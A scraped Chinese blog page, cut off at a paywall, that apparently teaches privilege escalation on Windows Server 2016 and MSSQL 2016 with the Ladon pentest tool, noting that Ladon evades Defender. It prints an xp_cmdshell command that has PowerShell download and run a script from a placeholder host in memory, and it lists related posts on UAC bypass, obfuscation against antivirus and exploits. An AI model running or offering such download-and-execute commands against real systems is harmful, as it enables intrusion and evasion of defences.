〖教程〗Ladon提权Win2016/Win10/MSSQL2016

最新推荐文章于 2024-05-10 13:48:03 发布
最新推荐文章于 2024-05-10 13:48:03 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: 本地提权 文章标签: win10提权 bypass win2016提权 mssql提权 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/112914404
版权
测试环境Windows Server 2016SQL: 13.0.1601.5Microsoft Windows [Version 10.0.14393]Ladon本地用户权限提权网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权MSSQL远程加载Ladon提权执行SQL查询权限为network service远程内存加载PowerLadon提权exec master..xp_cmdshell
摘要由CSDN通过智能技术生成

测试环境

Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]

Ladon本地用户权限提权

网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权
image

MSSQL远程加载Ladon提权

执行SQL查询权限为network service

image

远程内存加载PowerLadon提权
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx.800/Ladon.ps1''); Ladon Swe
最低0.47元/天 解锁文章
k8gege
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ladon简明教程 _ K8哥哥1
08-03
前言本文仅是Ladon简单使用例子,Cobalt Strike或PowerShell版用法一致。完整文档:http://k8gege.org/Ladon (ht
教程LadonMS16-135参数版(WIN7-2016)
K8哥哥
08-08 1221
漏洞名称 Win32k 特升漏洞(MS16-135)(CVE-2016-7255) 漏洞等级 高危 漏洞类型 本地 漏洞描述 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows
烂土豆搭配令牌窃取&dll劫持搭配令牌窃取&不带引号服务路径问题&不安全的服务限配置
weixin_46626159的博客
03-21 956
烂土豆搭配令牌窃取&dll劫持搭配令牌窃取&不带引号服务路径问题&不安全的服务限配置
Cobalt Strike CS 导入Ladon插件中文乱码
最新发布
2302_77302329的博客
05-10 250
Windows下使用cs加载各种插件遇到乱码,可以用下面命令指定编码打开客户端解决。
Windows本地 · 上篇
qq_61553520的博客
05-31 1651
Windows本地,这种适用于有一本地个用户的基础上,有一定的限,无法从webshell上进行
〖EXP〗Ladon打印机漏洞CVE-2021-1675复现
K8哥哥
07-11 2410
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler升漏洞,漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM限在域控制器上执行任意代码,从而获得整个域的控制。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 漏洞描述 Print Spooler是Windows系统中用于管理打印相关事务的服务。 该漏洞在域环境中合适的条件下,无需任何用户交互,未经身
Ladon 8.0五种白名单方法BypaaUAC
K8哥哥
07-15 487
什么是UAC 根据MSDN中的文档,User Account Control(UAC)是在Windows Vista 以后版本中引入的一种安全机制,针对具有有限限的账户. 通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问限。UAC 可以阻止未经授的应用程序自动进行安装,并防止无意中更改系统设置。 BypassUAC方法 目前公开的绕过UAC的几种方式: 1.各类的UAC白名单程序的DLL劫持 2.各类自动限的COM接口利用(Elevate
ladon入侵检测系统源码C#版本
05-14
ladon入侵检测系统源码C#版本,适合从业网络安全人员或者对网络安全爱好者
Ladon study源文件
04-08
ladon 渗透工具
Ladon以指定用户限运行程序或命令_K8哥哥1
08-03
Ladon以指定用户限运行程序或命令】是一个针对网络安全和系统管理的高级功能,主要解决了在非交互式环境中使用系统自带`Runas`命令的不便。Ladon是一款强大的自动化工具,它内置的`Runas`功能允许用户以不同限...
Ladon-master.zip
06-16
Ladon一款用于大型内网渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。
Ladon:大型内网渗透扫描器和Cobalt Strike,Ladon7.2内置94个模块,包含信息收集主机端口扫描服务识别密码爆破突破检测漏洞利用。漏洞检测包含MS17010SMBGhostWeblogicActiveMQTomcatStruts2,密码爆破(MysqlOracleMSSQL)FTPSSH(Linux) VNCWindows(IPCWMISMBNetbiosLDAPSmbHashWmiHashWinrm),远程执行命令(wmiexepsexecatexecsshexecwebshel​​
02-05
Ladon 7.2 20200815 程序简介 Ladon一种用于大型网络渗透性的多线程插件化综合扫描神器,包括端口扫描,服务识别,网络资产,密码爆破,高危漏洞检测以及一键GetShell,支持批量A段/ B段/ C段以及跨7.2版本内置94个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP,计算机名,工作组,共享资源,网卡地址,操作系统版本,网站,子域名,中间件,开放服务,路由器,数据库等信息,漏洞检测包含MS17010,SMBGhost,Weblogic,ActiveMQ,Tomcat,Struts2系列等,密码爆破13种含数据库(Mysql,Oracle ,MS
windows漏洞
08-02
漏洞
Ladon5.8大型网络渗透扫描器&源码
12-15
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置...
cs 插件 巨龙 巨龙拉冬插件 cs插件
03-18
具体到“Ladon9.0_巨龙拉冬插件”,这表明该插件是Ladon系列的第9.0版本,通常每个新版本都会包含前一版本的改进、修复已知问题,以及可能的新功能。用户在安装这个插件时,需要确保他们的游戏环境与该版本兼容,以...
Ladon-开源
07-01
Ladon 是一个分布式计算系统,用于替代分布式网络和各种@home 项目的专有软件。 目标是允许任何人在那里创建自己的分布式计算项目。 并简化高认识的过程
Windows常见的几种方法
热门推荐
hackzkaq的博客
05-20 1万+
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全—杰斯 高自己在服务器中的限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞升WEBSHELL限以夺得该服务器限,通常是把普通用户的升到管理员限或者系统限 在渗透测试过程中,拿到一个webshell之后,一般来说,我们的限都是目标服务器中间件的限。 这个时候就需要利用各种漏洞来升自己的限,从而能够获得对目标服务器的控制。 1.补丁查询法 简介 补丁一般都是为了应对计算机中存在的漏洞,为了更好的优化计算机的
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1684
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
Windows
haoge1998的博客
04-25 4808
Windows Windows基础知识 一、用户与用户组 在Windows中,不同用户有着不同的限。主要限包括有: 完全控制 修改 读取和执行 列出文件夹内容 读取 写入 1、内置用户 Administrator:系统管理员账号,拥有完全控制 Guest:来宾账号,基本限,默认时禁用 2、查看本地用户 net user 3、查看用户详细信息 net user darkid 用户也可以属于多个用户组,常见的用户组是 管理组(Administrators)、普通用户组(Users)、i
x-ladon x-argus python
09-18
X-Ladon和X-Argus是Python编程语言的两种库或框架。它们都是用于网络安全领域的工具,并且都供了许多有用的功能。 X-Ladon是一个轻量级的Python库,用于开发和部署RESTful风格的Web服务。它旨在供一种简单、可扩展和高性能的方法来构建和管理Web服务。X-Ladon供了许多功能,如身份验证和授、数据验证、参数转换和过滤、请求和响应加密等。使用X-Ladon,开发人员可以快速构建安全可靠的Web服务,并且可以轻松地扩展和管理它们。 X-Argus是一个功能强大的网络流量分析框架,用于实时监控和分析网络流量。它使用Python编程语言,并供了许多工具和功能,用于捕获、解析和分析网络数据包。X-Argus可以用于网络流量监控、异常检测、入侵检测系统等。它具有高性能和可扩展性,并且可以与其他相关工具和系统集成。 总而言之,X-Ladon和X-Argus都是Python编程语言中用于网络安全领域的重要工具。它们供了丰富的功能和灵活性,使开发人员能够快速构建和管理安全可靠的网络服务和分析系统。无论是开发Web服务还是进行网络流量分析,使用这些工具能够高效率和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值